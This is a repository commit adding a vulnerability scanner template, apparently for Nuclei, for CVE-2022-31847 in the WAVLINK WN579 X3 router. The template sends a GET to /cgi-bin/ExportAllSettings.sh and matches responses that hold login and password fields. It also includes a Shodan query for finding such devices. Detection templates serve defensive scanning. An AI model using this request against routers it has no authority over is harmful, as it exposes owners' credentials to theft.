Create CVE-2022-31847.yaml
parent
689a07d542
commit
7eb08d8df2
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2022-31847
|
||||
|
||||
info:
|
||||
name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN579 X3 M79X3.V5030.180719 allows attackers to obtain sensitive router information via a crafted POST request.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31847
|
||||
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md
|
||||
metadata:
|
||||
shodan-query: http.html:"Wavlink"
|
||||
verified: "true"
|
||||
tags: cve,2022,info,login,credentials
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'Login'
|
||||
- 'Password'
|
||||
- 'AuthMode'
|
Loading…
Reference in New Issue